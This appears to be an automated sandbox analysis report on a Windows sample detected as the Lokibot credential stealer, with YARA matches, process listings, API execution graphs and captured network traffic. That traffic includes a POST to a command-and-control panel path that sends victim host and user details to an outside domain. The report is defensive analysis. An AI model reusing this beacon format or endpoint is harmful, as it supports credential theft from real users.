                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f
                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
                    Apr 18, 2024 23:01:58.434993982 CEST403INData Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20
                    Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.44973391.92.253.228806464C:\Users\user\Desktop\lqoUUYTMsL.exe
                    TimestampBytes transferredDirectionData
                    Apr 18, 2024 23:01:58.789410114 CEST290OUTPOST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: tequilacofradiamx.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: D0B62332
                    Content-Length: 149
                    Connection: close
                    Apr 18, 2024 23:01:58.984152079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.rujones216041JONES-PC0FDD42EE188E931437F4FBE2C
                    Apr 18, 2024 23:01:59.179377079 CEST1289INHTTP/1.1 404 Not Found
                    Date: Thu, 18 Apr 2024 21:01:59 GMT
                    Server: Apache/2.2.15 (CentOS)
                    Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT
                    ETag: "6164b-587-616449379118c"
                    Accept-Ranges: bytes
                    Content-Length: 1415
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f
                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
                    Apr 18, 2024 23:01:59.179420948 CEST403INData Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20
                    Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:23:01:53
                    Start date:18/04/2024
                    Path:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\lqoUUYTMsL.exe"
                    Imagebase:0xd70000
                    File size:369'664 bytes
                    MD5 hash:3113C2A7B30C1CB350E8950B4222B0C4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:23:01:54
                    Start date:18/04/2024
                    Path:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Imagebase:0x9d0000
                    File size:369'664 bytes
                    MD5 hash:3113C2A7B30C1CB350E8950B4222B0C4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:23:01:54
                    Start date:18/04/2024
                    Path:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Imagebase:0xa20000
                    File size:369'664 bytes
                    MD5 hash:3113C2A7B30C1CB350E8950B4222B0C4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:23:01:54
                    Start date:18/04/2024
                    Path:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Imagebase:0xee0000
                    File size:369'664 bytes
                    MD5 hash:3113C2A7B30C1CB350E8950B4222B0C4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:4
                    Start time:23:01:54
                    Start date:18/04/2024
                    Path:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\lqoUUYTMsL.exe
                    Imagebase:0x8b0000
                    File size:369'664 bytes
                    MD5 hash:3113C2A7B30C1CB350E8950B4222B0C4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:19.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:12.8%
                      Total number of Nodes:47
                      Total number of Limit Nodes:3
                      execution_graph 6577 56a226c 6581 12da23a 6577->6581 6585 12da1f4 6577->6585 6578 56a2290 6582 12da26f VirtualProtect 6581->6582 6583 12da2a3 6581->6583 6584 12da284 6582->6584 6583->6582 6584->6578 6586 12da23a VirtualProtect 6585->6586 6588 12da284 6586->6588 6588->6578 6589 12dac2a 6591 12dac5f K32EnumProcessModules 6589->6591 6592 12dac8e 6591->6592 6593 12dafbe 6595 12daff3 GetExitCodeProcess 6593->6595 6596 12db01c 6595->6596 6641 12da65e 6642 12da6c9 6641->6642 6643 12da68a FindCloseChangeNotification 6641->6643 6642->6643 6644 12da698 6643->6644 6621 12da79a 6623 12da7c3 LookupPrivilegeValueW 6621->6623 6624 12da7ea 6623->6624 6606 12da9b6 6607 12da9e5 AdjustTokenPrivileges 6606->6607 6609 12daa07 6607->6609 6649 18b0070 6650 18b0094 6649->6650 6651 18b00ec 6650->6651 6653 18b19e2 6650->6653 6654 18b19ea 6653->6654 6656 12da23a VirtualProtect 6654->6656 6657 12da1f4 VirtualProtect 6654->6657 6655 18b1a08 6656->6655 6657->6655 6610 56a0477 6612 12da23a VirtualProtect 6610->6612 6613 12da1f4 VirtualProtect 6610->6613 6611 56a048e 6612->6611 6613->6611 6614 12dae32 6615 12dae82 K32GetModuleBaseNameW 6614->6615 6616 12dae8a 6615->6616 6629 12dad12 6630 12dad47 K32GetModuleInformation 6629->6630 6632 12dad7e 6630->6632 6658 12da452 6659 12da47e SetErrorMode 6658->6659 6660 12da4a7 6658->6660 6661 12da493 6659->6661 6660->6659

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 18b7dd0-18b7dd9 1 18b7ddb-18b7ddd 0->1 2 18b7d66 0->2 3 18b7d6a-18b7d85 1->3 4 18b7ddf-18b7e25 1->4 2->3 9 18b78b6-18b78d0 3->9 7 18b7e2c-18b7e6e 4->7 8 18b7e27 4->8 40 18b7e71 7->40 8->7 11 18b78d9-18b78da 9->11 12 18b78d2 9->12 13 18b7d8a-18b7d90 11->13 14 18b78df-18b78ef 11->14 12->14 15 18b7a2b-18b7a44 12->15 16 18b7c6b-18b7c6f 12->16 17 18b7a08-18b7a26 12->17 18 18b794f-18b795c 12->18 19 18b7c2f-18b7c3c 12->19 20 18b7bae-18b7bcd 12->20 21 18b7a5e-18b7a62 12->21 22 18b7c8d-18b7c9d 12->22 23 18b7bd2-18b7bea 12->23 24 18b7ca2-18b7cae 12->24 25 18b7a87-18b7a96 12->25 14->9 15->9 26 18b7c7b 16->26 27 18b7c71-18b7c79 16->27 17->9 18->9 19->9 20->9 30 18b7a6e 21->30 31 18b7a64-18b7a6c 21->31 22->9 35 18b7bec-18b7c00 23->35 36 18b7c02 23->36 28 18b7cb0 24->28 29 18b7cb5-18b7cc7 24->29 32 18b7a98 25->32 33 18b7a9d-18b7ab1 25->33 39 18b7c82-18b7c88 26->39 27->39 28->29 42 18b7cc9 29->42 43 18b7cce-18b7ce6 29->43 41 18b7a75-18b7a82 30->41 31->41 32->33 37 18b7ab8-18b7ad1 33->37 38 18b7ab3 33->38 44 18b7c05-18b7c2a 35->44 36->44 47 18b7ad8-18b7af1 37->47 48 18b7ad3 37->48 38->37 39->9 49 18b7e78-18b7e92 40->49 41->9 42->43 45 18b7ce8 43->45 46 18b7ced-18b7d06 43->46 44->9 45->46 51 18b7d08 46->51 52 18b7d0d-18b7d5d 46->52 54 18b7af8-18b7b15 47->54 55 18b7af3 47->55 48->47 56 18b7e9b-18b7e9c 49->56 57 18b7e94 49->57 51->52 75 18b7d5f-18b7d62 52->75 76 18b7d64-18b7d67 52->76 54->9 55->54 58 18b7ea1-18b7eaa 56->58 59 18b80e6-18b80eb 56->59 57->40 57->58 57->59 60 18b80a2-18b80a6 57->60 61 18b8080-18b8089 57->61 73 18b7eb3-18b7ebf 58->73 65 18b80a8-18b80ba 60->65 66 18b80bc 60->66 63 18b808b-18b808e 61->63 64 18b8098-18b80a1 61->64 63->64 67 18b80bf-18b80c1 65->67 66->67 70 18b80cd 67->70 71 18b80c3-18b80cb 67->71 72 18b80d4-18b80e1 70->72 71->72 72->49 108 18b7ec4 call 1a105e0 73->108 109 18b7ec4 call 1a10606 73->109 110 18b7ec4 call 18b8620 73->110 75->3 76->3 77 18b7eca-18b7efb 80 18b7efd-18b7f00 77->80 111 18b7f05 call 1a105e0 80->111 112 18b7f05 call 1a10606 80->112 81 18b7f0b-18b7f14 82 18b7f1d-18b7f97 81->82 91 18b7fa0 82->91 92 18b7fa9-18b7fb3 91->92 93 18b7fba-18b7fc7 92->93 94 18b7fb5 92->94 95 18b7fc9 93->95 96 18b7fce-18b7fe0 93->96 94->93 95->96 97 18b7fe2 96->97 98 18b7fe7-18b7ff9 96->98 97->98 99 18b7ffb 98->99 100 18b8000-18b8047 98->100 99->100 104 18b8049-18b8059 100->104 105 18b805c-18b8062 100->105 104->105 107 18b806a-18b807b 105->107 107->49 108->77 109->77 110->77 111->81 112->81
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: T4c$T4c$\O'l$\O'l$\O'l
                      • API String ID: 0-1240238097
                      • Opcode ID: 352c54deb42ca4c969d5682a35a6e15fc2f105e9711cc30bb4756202c19d883d
                      • Instruction ID: 0155a37d9910b33a4752cf5ff33886c4315f379d66c70b9d6cdae4329577fcce
                      • Opcode Fuzzy Hash: 352c54deb42ca4c969d5682a35a6e15fc2f105e9711cc30bb4756202c19d883d
                      • Instruction Fuzzy Hash: 34124474E04208DFDB14CFA9D5849ADBBF2FF89304B2480A9D415AB395DB35AA42CF64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
